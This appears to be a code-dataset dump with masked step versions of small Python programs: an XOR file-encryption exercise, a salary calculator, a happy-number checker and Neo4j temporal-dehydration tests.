result.append(text[i] ^ key[i % len(key)])
inputoutput.write_to_file(result, destination, 'b')
<|reserved_special_token_0|>
xor_encryption('sixth_practice/text.txt', 'sixth_practice/text1.txt', key)
xor_encryption('sixth_practice/text1.txt', 'sixth_practice/text2.txt', key)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def xor_encryption(source, destination, key):
"""
Returns text encrypted or decrypted with xor
Keyword arguments:
source - path to file with text to be encrypted
destination - path to the file where you want to save the result
key - encryption key
"""
text = inputoutput.read_from_file(source, 'b')
key = bytearray(key, 'utf-8')
result = bytearray()
for i in range(len(text)):
result.append(text[i] ^ key[i % len(key)])
inputoutput.write_to_file(result, destination, 'b')
key = 'verystongk'
xor_encryption('sixth_practice/text.txt', 'sixth_practice/text1.txt', key)
xor_encryption('sixth_practice/text1.txt', 'sixth_practice/text2.txt', key)
<|reserved_special_token_1|>
import inputoutput
def xor_encryption(source, destination, key):
"""
Returns text encrypted or decrypted with xor
Keyword arguments:
source - path to file with text to be encrypted
destination - path to the file where you want to save the result
key - encryption key
"""
text = inputoutput.read_from_file(source, 'b')
key = bytearray(key, 'utf-8')
result = bytearray()
for i in range(len(text)):
result.append(text[i] ^ key[i % len(key)])
inputoutput.write_to_file(result, destination, 'b')
key = 'verystongk'
xor_encryption('sixth_practice/text.txt', 'sixth_practice/text1.txt', key)
xor_encryption('sixth_practice/text1.txt', 'sixth_practice/text2.txt', key)
<|reserved_special_token_1|>
import inputoutput
def xor_encryption(source, destination, key):
"""
Returns text encrypted or decrypted with xor
Keyword arguments:
source - path to file with text to be encrypted
destination - path to the file where you want to save the result
key - encryption key
"""
text = inputoutput.read_from_file(source, "b")
# text = read_from_file(source)
key = bytearray(key, 'utf-8')
result = bytearray()
for i in range(len(text)):
result.append(text[i] ^ key[i % len(key)])
inputoutput.write_to_file(result, destination, "b")
# def write_to_file(data, filename):
# """
# Write binary data to file
# Keyword arguments:
# data - binary data to be written
# filename - path to the file where you want to save the result
# """
# f = open(filename, 'wb')
# f.write(data)
# f.close()
# def read_from_file(filename):
# """
# Read binary data from file
# Keyword arguments:
# filename - path to the file where you want to save the result
# Returns:
# data - binary data from file
# """
# f = open(filename, 'rb')
# data = f.read()
# f.close()
# return data
key = 'verystongk'
# Шифрование
xor_encryption('sixth_practice/text.txt', 'sixth_practice/text1.txt', key)
# Расшифрование
xor_encryption('sixth_practice/text1.txt', 'sixth_practice/text2.txt', key)
|
flexible
|
{
"blob_id": "81774d3b4d9fbf22ed19e1cba7ec5e8e3707f51a",
"index": 2076,
"step-1": "<mask token>\n\n\ndef xor_encryption(source, destination, key):\n \"\"\"\n Returns text encrypted or decrypted with xor\n\n Keyword arguments:\n source - path to file with text to be encrypted\n destination - path to the file where you want to save the result\n key - encryption key\n \"\"\"\n text = inputoutput.read_from_file(source, 'b')\n key = bytearray(key, 'utf-8')\n result = bytearray()\n for i in range(len(text)):\n result.append(text[i] ^ key[i % len(key)])\n inputoutput.write_to_file(result, destination, 'b')\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef xor_encryption(source, destination, key):\n \"\"\"\n Returns text encrypted or decrypted with xor\n\n Keyword arguments:\n source - path to file with text to be encrypted\n destination - path to the file where you want to save the result\n key - encryption key\n \"\"\"\n text = inputoutput.read_from_file(source, 'b')\n key = bytearray(key, 'utf-8')\n result = bytearray()\n for i in range(len(text)):\n result.append(text[i] ^ key[i % len(key)])\n inputoutput.write_to_file(result, destination, 'b')\n\n\n<mask token>\nxor_encryption('sixth_practice/text.txt', 'sixth_practice/text1.txt', key)\nxor_encryption('sixth_practice/text1.txt', 'sixth_practice/text2.txt', key)\n",
"step-3": "<mask token>\n\n\ndef xor_encryption(source, destination, key):\n \"\"\"\n Returns text encrypted or decrypted with xor\n\n Keyword arguments:\n source - path to file with text to be encrypted\n destination - path to the file where you want to save the result\n key - encryption key\n \"\"\"\n text = inputoutput.read_from_file(source, 'b')\n key = bytearray(key, 'utf-8')\n result = bytearray()\n for i in range(len(text)):\n result.append(text[i] ^ key[i % len(key)])\n inputoutput.write_to_file(result, destination, 'b')\n\n\nkey = 'verystongk'\nxor_encryption('sixth_practice/text.txt', 'sixth_practice/text1.txt', key)\nxor_encryption('sixth_practice/text1.txt', 'sixth_practice/text2.txt', key)\n",
"step-4": "import inputoutput\n\n\ndef xor_encryption(source, destination, key):\n \"\"\"\n Returns text encrypted or decrypted with xor\n\n Keyword arguments:\n source - path to file with text to be encrypted\n destination - path to the file where you want to save the result\n key - encryption key\n \"\"\"\n text = inputoutput.read_from_file(source, 'b')\n key = bytearray(key, 'utf-8')\n result = bytearray()\n for i in range(len(text)):\n result.append(text[i] ^ key[i % len(key)])\n inputoutput.write_to_file(result, destination, 'b')\n\n\nkey = 'verystongk'\nxor_encryption('sixth_practice/text.txt', 'sixth_practice/text1.txt', key)\nxor_encryption('sixth_practice/text1.txt', 'sixth_practice/text2.txt', key)\n",
"step-5": "import inputoutput\n\n\ndef xor_encryption(source, destination, key):\n \"\"\"\n Returns text encrypted or decrypted with xor\n\n Keyword arguments:\n source - path to file with text to be encrypted\n destination - path to the file where you want to save the result\n key - encryption key\n \"\"\"\n text = inputoutput.read_from_file(source, \"b\")\n # text = read_from_file(source)\n key = bytearray(key, 'utf-8')\n result = bytearray()\n for i in range(len(text)):\n result.append(text[i] ^ key[i % len(key)])\n inputoutput.write_to_file(result, destination, \"b\")\n\n\n# def write_to_file(data, filename):\n# \"\"\"\n# Write binary data to file\n\n# Keyword arguments:\n# data - binary data to be written\n# filename - path to the file where you want to save the result\n# \"\"\"\n# f = open(filename, 'wb')\n# f.write(data)\n# f.close()\n\n\n# def read_from_file(filename):\n# \"\"\"\n# Read binary data from file\n\n# Keyword arguments:\n# filename - path to the file where you want to save the result\n\n# Returns:\n# data - binary data from file\n# \"\"\"\n# f = open(filename, 'rb')\n# data = f.read()\n# f.close()\n# return data\n\n\nkey = 'verystongk'\n# Шифрование\nxor_encryption('sixth_practice/text.txt', 'sixth_practice/text1.txt', key)\n# Расшифрование\nxor_encryption('sixth_practice/text1.txt', 'sixth_practice/text2.txt', key)\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
salario = float(input('Qual o valor do seu Salario atual? R$ '))
novo = salario + (salario * 15 / 100)
print('Um funcioario que ganhava R$ {:.2f} com o aumento de 15% passa a ganhar R$ {:.2f}'.format(salario, novo))
|
normal
|
{
"blob_id": "ffcd3c0086ff73eb722d867b335df23382615d20",
"index": 1657,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint(\n 'Um funcioario que ganhava R$ {:.2f} com o aumento de 15% passa a ganhar R$ {:.2f}'\n .format(salario, novo))\n",
"step-3": "salario = float(input('Qual o valor do seu Salario atual? R$ '))\nnovo = salario + salario * 15 / 100\nprint(\n 'Um funcioario que ganhava R$ {:.2f} com o aumento de 15% passa a ganhar R$ {:.2f}'\n .format(salario, novo))\n",
"step-4": "salario = float(input('Qual o valor do seu Salario atual? R$ '))\nnovo = salario + (salario * 15 / 100)\nprint('Um funcioario que ganhava R$ {:.2f} com o aumento de 15% passa a ganhar R$ {:.2f}'.format(salario, novo))",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
def find_happy_number(num):
slow, fast = num, num
while True:
slow = find_square_sum(slow) # move one step
fast = find_square_sum(find_square_sum(fast)) # move two steps
if slow == fast: # found the cycle
break
return slow == 1 # see if the cycle is stuck on the number '1'
def find_square_sum(num):
_sum = 0
while (num > 0):
digit = num % 10
_sum += digit * digit
num //= 10
return _sum
print(find_happy_number(23))
print(find_happy_number(12))
|
normal
|
{
"blob_id": "60b5e515c7275bfa0f79e22f54302a578c2f7b79",
"index": 728,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef find_square_sum(num):\n _sum = 0\n while num > 0:\n digit = num % 10\n _sum += digit * digit\n num //= 10\n return _sum\n\n\n<mask token>\n",
"step-3": "def find_happy_number(num):\n slow, fast = num, num\n while True:\n slow = find_square_sum(slow)\n fast = find_square_sum(find_square_sum(fast))\n if slow == fast:\n break\n return slow == 1\n\n\ndef find_square_sum(num):\n _sum = 0\n while num > 0:\n digit = num % 10\n _sum += digit * digit\n num //= 10\n return _sum\n\n\n<mask token>\n",
"step-4": "def find_happy_number(num):\n slow, fast = num, num\n while True:\n slow = find_square_sum(slow)\n fast = find_square_sum(find_square_sum(fast))\n if slow == fast:\n break\n return slow == 1\n\n\ndef find_square_sum(num):\n _sum = 0\n while num > 0:\n digit = num % 10\n _sum += digit * digit\n num //= 10\n return _sum\n\n\nprint(find_happy_number(23))\nprint(find_happy_number(12))\n",
"step-5": "def find_happy_number(num):\n slow, fast = num, num\n while True:\n slow = find_square_sum(slow) # move one step\n fast = find_square_sum(find_square_sum(fast)) # move two steps\n if slow == fast: # found the cycle\n break\n return slow == 1 # see if the cycle is stuck on the number '1'\n\n\ndef find_square_sum(num):\n _sum = 0\n while (num > 0):\n digit = num % 10\n _sum += digit * digit\n num //= 10\n return _sum\n\nprint(find_happy_number(23)) \nprint(find_happy_number(12))",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
class TestTimeDehydration(_TestTemporalDehydrationV1):
@pytest.fixture
def hydration_handler(self):
return HydrationHandler()
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def test_pandas_date_time_fixed_offset(self, assert_transforms):
dt = pd.Timestamp('2018-10-12T11:37:41.474716862+0100')
assert_transforms(dt, Structure(b'I', 1539340661, 474716862, 3600))
def test_date_time_fixed_negative_offset(self, assert_transforms):
dt = DateTime(2018, 10, 12, 11, 37, 41, 474716862, pytz.FixedOffset
(-60))
assert_transforms(dt, Structure(b'I', 1539347861, 474716862, -3600))
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def test_native_date_time_zone_id(self, assert_transforms):
dt = datetime.datetime(2018, 10, 12, 11, 37, 41, 474716)
dt = pytz.timezone('Europe/Stockholm').localize(dt)
assert_transforms(dt, Structure(b'i', 1539337061, 474716000,
'Europe/Stockholm'))
@pytest.mark.parametrize(('dt', 'fields'), ((pd.Timestamp(
'2018-10-12T11:37:41.474716862+0200', tz='Europe/Stockholm'), (
1539337061, 474716862, 'Europe/Stockholm')), (pd.Timestamp((1032 *
24 + 2) * 3600 * 1000000000 + 1001000001, tz='Europe/London'), ((
1032 * 24 + 2) * 3600 + 1, 1000001, 'Europe/London')), (pd.
Timestamp((1032 * 24 + 1) * 3600 * 1000000000 + 1001000001, tz=
'Europe/London'), ((1032 * 24 + 1) * 3600 + 1, 1000001,
'Europe/London'))))
def test_pandas_date_time_zone_id(self, dt, fields, assert_transforms):
assert_transforms(dt, Structure(b'i', *fields))
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class TestTimeDehydration(_TestTemporalDehydrationV1):
@pytest.fixture
def hydration_handler(self):
return HydrationHandler()
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def test_pandas_date_time_fixed_offset(self, assert_transforms):
dt = pd.Timestamp('2018-10-12T11:37:41.474716862+0100')
assert_transforms(dt, Structure(b'I', 1539340661, 474716862, 3600))
def test_date_time_fixed_negative_offset(self, assert_transforms):
dt = DateTime(2018, 10, 12, 11, 37, 41, 474716862, pytz.FixedOffset
(-60))
assert_transforms(dt, Structure(b'I', 1539347861, 474716862, -3600))
def test_native_date_time_fixed_negative_offset(self, assert_transforms):
dt = datetime.datetime(2018, 10, 12, 11, 37, 41, 474716, pytz.
FixedOffset(-60))
assert_transforms(dt, Structure(b'I', 1539347861, 474716000, -3600))
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def test_native_date_time_zone_id(self, assert_transforms):
dt = datetime.datetime(2018, 10, 12, 11, 37, 41, 474716)
dt = pytz.timezone('Europe/Stockholm').localize(dt)
assert_transforms(dt, Structure(b'i', 1539337061, 474716000,
'Europe/Stockholm'))
@pytest.mark.parametrize(('dt', 'fields'), ((pd.Timestamp(
'2018-10-12T11:37:41.474716862+0200', tz='Europe/Stockholm'), (
1539337061, 474716862, 'Europe/Stockholm')), (pd.Timestamp((1032 *
24 + 2) * 3600 * 1000000000 + 1001000001, tz='Europe/London'), ((
1032 * 24 + 2) * 3600 + 1, 1000001, 'Europe/London')), (pd.
Timestamp((1032 * 24 + 1) * 3600 * 1000000000 + 1001000001, tz=
'Europe/London'), ((1032 * 24 + 1) * 3600 + 1, 1000001,
'Europe/London'))))
def test_pandas_date_time_zone_id(self, dt, fields, assert_transforms):
assert_transforms(dt, Structure(b'i', *fields))
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class TestTimeDehydration(_TestTemporalDehydrationV1):
@pytest.fixture
def hydration_handler(self):
return HydrationHandler()
<|reserved_special_token_0|>
def test_native_date_time_fixed_offset(self, assert_transforms):
dt = datetime.datetime(2018, 10, 12, 11, 37, 41, 474716, pytz.
FixedOffset(60))
assert_transforms(dt, Structure(b'I', 1539340661, 474716000, 3600))
def test_pandas_date_time_fixed_offset(self, assert_transforms):
dt = pd.Timestamp('2018-10-12T11:37:41.474716862+0100')
assert_transforms(dt, Structure(b'I', 1539340661, 474716862, 3600))
def test_date_time_fixed_negative_offset(self, assert_transforms):
dt = DateTime(2018, 10, 12, 11, 37, 41, 474716862, pytz.FixedOffset
(-60))
assert_transforms(dt, Structure(b'I', 1539347861, 474716862, -3600))
def test_native_date_time_fixed_negative_offset(self, assert_transforms):
dt = datetime.datetime(2018, 10, 12, 11, 37, 41, 474716, pytz.
FixedOffset(-60))
assert_transforms(dt, Structure(b'I', 1539347861, 474716000, -3600))
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def test_native_date_time_zone_id(self, assert_transforms):
dt = datetime.datetime(2018, 10, 12, 11, 37, 41, 474716)
dt = pytz.timezone('Europe/Stockholm').localize(dt)
assert_transforms(dt, Structure(b'i', 1539337061, 474716000,
'Europe/Stockholm'))
@pytest.mark.parametrize(('dt', 'fields'), ((pd.Timestamp(
'2018-10-12T11:37:41.474716862+0200', tz='Europe/Stockholm'), (
1539337061, 474716862, 'Europe/Stockholm')), (pd.Timestamp((1032 *
24 + 2) * 3600 * 1000000000 + 1001000001, tz='Europe/London'), ((
1032 * 24 + 2) * 3600 + 1, 1000001, 'Europe/London')), (pd.
Timestamp((1032 * 24 + 1) * 3600 * 1000000000 + 1001000001, tz=
'Europe/London'), ((1032 * 24 + 1) * 3600 + 1, 1000001,
'Europe/London'))))
def test_pandas_date_time_zone_id(self, dt, fields, assert_transforms):
assert_transforms(dt, Structure(b'i', *fields))
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class TestTimeDehydration(_TestTemporalDehydrationV1):
@pytest.fixture
def hydration_handler(self):
return HydrationHandler()
def test_date_time_fixed_offset(self, assert_transforms):
dt = DateTime(2018, 10, 12, 11, 37, 41, 474716862, pytz.FixedOffset(60)
)
assert_transforms(dt, Structure(b'I', 1539340661, 474716862, 3600))
def test_native_date_time_fixed_offset(self, assert_transforms):
dt = datetime.datetime(2018, 10, 12, 11, 37, 41, 474716, pytz.
FixedOffset(60))
assert_transforms(dt, Structure(b'I', 1539340661, 474716000, 3600))
def test_pandas_date_time_fixed_offset(self, assert_transforms):
dt = pd.Timestamp('2018-10-12T11:37:41.474716862+0100')
assert_transforms(dt, Structure(b'I', 1539340661, 474716862, 3600))
def test_date_time_fixed_negative_offset(self, assert_transforms):
dt = DateTime(2018, 10, 12, 11, 37, 41, 474716862, pytz.FixedOffset
(-60))
assert_transforms(dt, Structure(b'I', 1539347861, 474716862, -3600))
def test_native_date_time_fixed_negative_offset(self, assert_transforms):
dt = datetime.datetime(2018, 10, 12, 11, 37, 41, 474716, pytz.
FixedOffset(-60))
assert_transforms(dt, Structure(b'I', 1539347861, 474716000, -3600))
def test_pandas_date_time_fixed_negative_offset(self, assert_transforms):
dt = pd.Timestamp('2018-10-12T11:37:41.474716862-0100')
assert_transforms(dt, Structure(b'I', 1539347861, 474716862, -3600))
def test_date_time_zone_id(self, assert_transforms):
dt = DateTime(2018, 10, 12, 11, 37, 41, 474716862)
dt = pytz.timezone('Europe/Stockholm').localize(dt)
assert_transforms(dt, Structure(b'i', 1539337061, 474716862,
'Europe/Stockholm'))
def test_native_date_time_zone_id(self, assert_transforms):
dt = datetime.datetime(2018, 10, 12, 11, 37, 41, 474716)
dt = pytz.timezone('Europe/Stockholm').localize(dt)
assert_transforms(dt, Structure(b'i', 1539337061, 474716000,
'Europe/Stockholm'))
@pytest.mark.parametrize(('dt', 'fields'), ((pd.Timestamp(
'2018-10-12T11:37:41.474716862+0200', tz='Europe/Stockholm'), (
1539337061, 474716862, 'Europe/Stockholm')), (pd.Timestamp((1032 *
24 + 2) * 3600 * 1000000000 + 1001000001, tz='Europe/London'), ((
1032 * 24 + 2) * 3600 + 1, 1000001, 'Europe/London')), (pd.
Timestamp((1032 * 24 + 1) * 3600 * 1000000000 + 1001000001, tz=
'Europe/London'), ((1032 * 24 + 1) * 3600 + 1, 1000001,
'Europe/London'))))
def test_pandas_date_time_zone_id(self, dt, fields, assert_transforms):
assert_transforms(dt, Structure(b'i', *fields))
<|reserved_special_token_1|>
# Copyright (c) "Neo4j"
# Neo4j Sweden AB [https://neo4j.com]
#
# This file is part of Neo4j.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import datetime
import pandas as pd
import pytest
import pytz
from neo4j._codec.hydration.v2 import HydrationHandler
from neo4j._codec.packstream import Structure
from neo4j.time import DateTime
from ..v1.test_temporal_dehydration import (
TestTimeDehydration as _TestTemporalDehydrationV1,
)
class TestTimeDehydration(_TestTemporalDehydrationV1):
@pytest.fixture
def hydration_handler(self):
return HydrationHandler()
def test_date_time_fixed_offset(self, assert_transforms):
dt = DateTime(2018, 10, 12, 11, 37, 41, 474716862,
pytz.FixedOffset(60))
assert_transforms(
dt,
Structure(b"I", 1539340661, 474716862, 3600)
)
def test_native_date_time_fixed_offset(self, assert_transforms):
dt = datetime.datetime(2018, 10, 12, 11, 37, 41, 474716,
pytz.FixedOffset(60))
assert_transforms(
dt,
Structure(b"I", 1539340661, 474716000, 3600)
)
def test_pandas_date_time_fixed_offset(self, assert_transforms):
dt = pd.Timestamp("2018-10-12T11:37:41.474716862+0100")
assert_transforms(dt, Structure(b"I", 1539340661, 474716862, 3600))
def test_date_time_fixed_negative_offset(self, assert_transforms):
dt = DateTime(2018, 10, 12, 11, 37, 41, 474716862,
pytz.FixedOffset(-60))
assert_transforms(
dt,
Structure(b"I", 1539347861, 474716862, -3600)
)
def test_native_date_time_fixed_negative_offset(self, assert_transforms):
dt = datetime.datetime(2018, 10, 12, 11, 37, 41, 474716,
pytz.FixedOffset(-60))
assert_transforms(
dt,
Structure(b"I", 1539347861, 474716000, -3600)
)
def test_pandas_date_time_fixed_negative_offset(self, assert_transforms):
dt = pd.Timestamp("2018-10-12T11:37:41.474716862-0100")
assert_transforms(dt, Structure(b"I", 1539347861, 474716862, -3600))
def test_date_time_zone_id(self, assert_transforms):
dt = DateTime(2018, 10, 12, 11, 37, 41, 474716862)
dt = pytz.timezone("Europe/Stockholm").localize(dt)
# offset should be UTC+2 (7200 seconds)
assert_transforms(
dt,
Structure(b"i", 1539337061, 474716862, "Europe/Stockholm")
)
def test_native_date_time_zone_id(self, assert_transforms):
dt = datetime.datetime(2018, 10, 12, 11, 37, 41, 474716)
dt = pytz.timezone("Europe/Stockholm").localize(dt)
# offset should be UTC+2 (7200 seconds)
assert_transforms(
dt,
Structure(b"i", 1539337061, 474716000, "Europe/Stockholm")
)
@pytest.mark.parametrize(("dt", "fields"), (
(
pd.Timestamp("2018-10-12T11:37:41.474716862+0200",
tz="Europe/Stockholm"),
(1539337061, 474716862, "Europe/Stockholm"),
),
(
# 1972-10-29 02:00:01.001000001+0100 pre DST change
pd.Timestamp((1032 * 24 + 2) * 3600 * 1000000000 + 1001000001,
tz="Europe/London"),
((1032 * 24 + 2) * 3600 + 1, 1000001, "Europe/London"),
),
(
# 1972-10-29 02:00:01.001000001+0000 post DST change
pd.Timestamp((1032 * 24 + 1) * 3600 * 1000000000 + 1001000001,
tz="Europe/London"),
((1032 * 24 + 1) * 3600 + 1, 1000001, "Europe/London"),
)
))
def test_pandas_date_time_zone_id(self, dt, fields, assert_transforms):
assert_transforms(dt, Structure(b"i", *fields))
|
flexible
|
{
"blob_id": "5b33615e1890631bac68801310e4b606ac41cb13",
"index": 1340,
"step-1": "<mask token>\n\n\nclass TestTimeDehydration(_TestTemporalDehydrationV1):\n\n @pytest.fixture\n def hydration_handler(self):\n return HydrationHandler()\n <mask token>\n <mask token>\n\n def test_pandas_date_time_fixed_offset(self, assert_transforms):\n dt = pd.Timestamp('2018-10-12T11:37:41.474716862+0100')\n assert_transforms(dt, Structure(b'I', 1539340661, 474716862, 3600))\n\n def test_date_time_fixed_negative_offset(self, assert_transforms):\n dt = DateTime(2018, 10, 12, 11, 37, 41, 474716862, pytz.FixedOffset\n (-60))\n assert_transforms(dt, Structure(b'I', 1539347861, 474716862, -3600))\n <mask token>\n <mask token>\n <mask token>\n\n def test_native_date_time_zone_id(self, assert_transforms):\n dt = datetime.datetime(2018, 10, 12, 11, 37, 41, 474716)\n dt = pytz.timezone('Europe/Stockholm').localize(dt)\n assert_transforms(dt, Structure(b'i', 1539337061, 474716000,\n 'Europe/Stockholm'))\n\n @pytest.mark.parametrize(('dt', 'fields'), ((pd.Timestamp(\n '2018-10-12T11:37:41.474716862+0200', tz='Europe/Stockholm'), (\n 1539337061, 474716862, 'Europe/Stockholm')), (pd.Timestamp((1032 * \n 24 + 2) * 3600 * 1000000000 + 1001000001, tz='Europe/London'), ((\n 1032 * 24 + 2) * 3600 + 1, 1000001, 'Europe/London')), (pd.\n Timestamp((1032 * 24 + 1) * 3600 * 1000000000 + 1001000001, tz=\n 'Europe/London'), ((1032 * 24 + 1) * 3600 + 1, 1000001,\n 'Europe/London'))))\n def test_pandas_date_time_zone_id(self, dt, fields, assert_transforms):\n assert_transforms(dt, Structure(b'i', *fields))\n",
"step-2": "<mask token>\n\n\nclass TestTimeDehydration(_TestTemporalDehydrationV1):\n\n @pytest.fixture\n def hydration_handler(self):\n return HydrationHandler()\n <mask token>\n <mask token>\n\n def test_pandas_date_time_fixed_offset(self, assert_transforms):\n dt = pd.Timestamp('2018-10-12T11:37:41.474716862+0100')\n assert_transforms(dt, Structure(b'I', 1539340661, 474716862, 3600))\n\n def test_date_time_fixed_negative_offset(self, assert_transforms):\n dt = DateTime(2018, 10, 12, 11, 37, 41, 474716862, pytz.FixedOffset\n (-60))\n assert_transforms(dt, Structure(b'I', 1539347861, 474716862, -3600))\n\n def test_native_date_time_fixed_negative_offset(self, assert_transforms):\n dt = datetime.datetime(2018, 10, 12, 11, 37, 41, 474716, pytz.\n FixedOffset(-60))\n assert_transforms(dt, Structure(b'I', 1539347861, 474716000, -3600))\n <mask token>\n <mask token>\n\n def test_native_date_time_zone_id(self, assert_transforms):\n dt = datetime.datetime(2018, 10, 12, 11, 37, 41, 474716)\n dt = pytz.timezone('Europe/Stockholm').localize(dt)\n assert_transforms(dt, Structure(b'i', 1539337061, 474716000,\n 'Europe/Stockholm'))\n\n @pytest.mark.parametrize(('dt', 'fields'), ((pd.Timestamp(\n '2018-10-12T11:37:41.474716862+0200', tz='Europe/Stockholm'), (\n 1539337061, 474716862, 'Europe/Stockholm')), (pd.Timestamp((1032 * \n 24 + 2) * 3600 * 1000000000 + 1001000001, tz='Europe/London'), ((\n 1032 * 24 + 2) * 3600 + 1, 1000001, 'Europe/London')), (pd.\n Timestamp((1032 * 24 + 1) * 3600 * 1000000000 + 1001000001, tz=\n 'Europe/London'), ((1032 * 24 + 1) * 3600 + 1, 1000001,\n 'Europe/London'))))\n def test_pandas_date_time_zone_id(self, dt, fields, assert_transforms):\n assert_transforms(dt, Structure(b'i', *fields))\n",
"step-3": "<mask token>\n\n\nclass TestTimeDehydration(_TestTemporalDehydrationV1):\n\n @pytest.fixture\n def hydration_handler(self):\n return HydrationHandler()\n <mask token>\n\n def test_native_date_time_fixed_offset(self, assert_transforms):\n dt = datetime.datetime(2018, 10, 12, 11, 37, 41, 474716, pytz.\n FixedOffset(60))\n assert_transforms(dt, Structure(b'I', 1539340661, 474716000, 3600))\n\n def test_pandas_date_time_fixed_offset(self, assert_transforms):\n dt = pd.Timestamp('2018-10-12T11:37:41.474716862+0100')\n assert_transforms(dt, Structure(b'I', 1539340661, 474716862, 3600))\n\n def test_date_time_fixed_negative_offset(self, assert_transforms):\n dt = DateTime(2018, 10, 12, 11, 37, 41, 474716862, pytz.FixedOffset\n (-60))\n assert_transforms(dt, Structure(b'I', 1539347861, 474716862, -3600))\n\n def test_native_date_time_fixed_negative_offset(self, assert_transforms):\n dt = datetime.datetime(2018, 10, 12, 11, 37, 41, 474716, pytz.\n FixedOffset(-60))\n assert_transforms(dt, Structure(b'I', 1539347861, 474716000, -3600))\n <mask token>\n <mask token>\n\n def test_native_date_time_zone_id(self, assert_transforms):\n dt = datetime.datetime(2018, 10, 12, 11, 37, 41, 474716)\n dt = pytz.timezone('Europe/Stockholm').localize(dt)\n assert_transforms(dt, Structure(b'i', 1539337061, 474716000,\n 'Europe/Stockholm'))\n\n @pytest.mark.parametrize(('dt', 'fields'), ((pd.Timestamp(\n '2018-10-12T11:37:41.474716862+0200', tz='Europe/Stockholm'), (\n 1539337061, 474716862, 'Europe/Stockholm')), (pd.Timestamp((1032 * \n 24 + 2) * 3600 * 1000000000 + 1001000001, tz='Europe/London'), ((\n 1032 * 24 + 2) * 3600 + 1, 1000001, 'Europe/London')), (pd.\n Timestamp((1032 * 24 + 1) * 3600 * 1000000000 + 1001000001, tz=\n 'Europe/London'), ((1032 * 24 + 1) * 3600 + 1, 1000001,\n 'Europe/London'))))\n def test_pandas_date_time_zone_id(self, dt, fields, assert_transforms):\n assert_transforms(dt, Structure(b'i', *fields))\n",
"step-4": "<mask token>\n\n\nclass TestTimeDehydration(_TestTemporalDehydrationV1):\n\n @pytest.fixture\n def hydration_handler(self):\n return HydrationHandler()\n\n def test_date_time_fixed_offset(self, assert_transforms):\n dt = DateTime(2018, 10, 12, 11, 37, 41, 474716862, pytz.FixedOffset(60)\n )\n assert_transforms(dt, Structure(b'I', 1539340661, 474716862, 3600))\n\n def test_native_date_time_fixed_offset(self, assert_transforms):\n dt = datetime.datetime(2018, 10, 12, 11, 37, 41, 474716, pytz.\n FixedOffset(60))\n assert_transforms(dt, Structure(b'I', 1539340661, 474716000, 3600))\n\n def test_pandas_date_time_fixed_offset(self, assert_transforms):\n dt = pd.Timestamp('2018-10-12T11:37:41.474716862+0100')\n assert_transforms(dt, Structure(b'I', 1539340661, 474716862, 3600))\n\n def test_date_time_fixed_negative_offset(self, assert_transforms):\n dt = DateTime(2018, 10, 12, 11, 37, 41, 474716862, pytz.FixedOffset\n (-60))\n assert_transforms(dt, Structure(b'I', 1539347861, 474716862, -3600))\n\n def test_native_date_time_fixed_negative_offset(self, assert_transforms):\n dt = datetime.datetime(2018, 10, 12, 11, 37, 41, 474716, pytz.\n FixedOffset(-60))\n assert_transforms(dt, Structure(b'I', 1539347861, 474716000, -3600))\n\n def test_pandas_date_time_fixed_negative_offset(self, assert_transforms):\n dt = pd.Timestamp('2018-10-12T11:37:41.474716862-0100')\n assert_transforms(dt, Structure(b'I', 1539347861, 474716862, -3600))\n\n def test_date_time_zone_id(self, assert_transforms):\n dt = DateTime(2018, 10, 12, 11, 37, 41, 474716862)\n dt = pytz.timezone('Europe/Stockholm').localize(dt)\n assert_transforms(dt, Structure(b'i', 1539337061, 474716862,\n 'Europe/Stockholm'))\n\n def test_native_date_time_zone_id(self, assert_transforms):\n dt = datetime.datetime(2018, 10, 12, 11, 37, 41, 474716)\n dt = pytz.timezone('Europe/Stockholm').localize(dt)\n assert_transforms(dt, Structure(b'i', 1539337061, 474716000,\n 'Europe/Stockholm'))\n\n @pytest.mark.parametrize(('dt', 'fields'), ((pd.Timestamp(\n '2018-10-12T11:37:41.474716862+0200', tz='Europe/Stockholm'), (\n 1539337061, 474716862, 'Europe/Stockholm')), (pd.Timestamp((1032 * \n 24 + 2) * 3600 * 1000000000 + 1001000001, tz='Europe/London'), ((\n 1032 * 24 + 2) * 3600 + 1, 1000001, 'Europe/London')), (pd.\n Timestamp((1032 * 24 + 1) * 3600 * 1000000000 + 1001000001, tz=\n 'Europe/London'), ((1032 * 24 + 1) * 3600 + 1, 1000001,\n 'Europe/London'))))\n def test_pandas_date_time_zone_id(self, dt, fields, assert_transforms):\n assert_transforms(dt, Structure(b'i', *fields))\n",
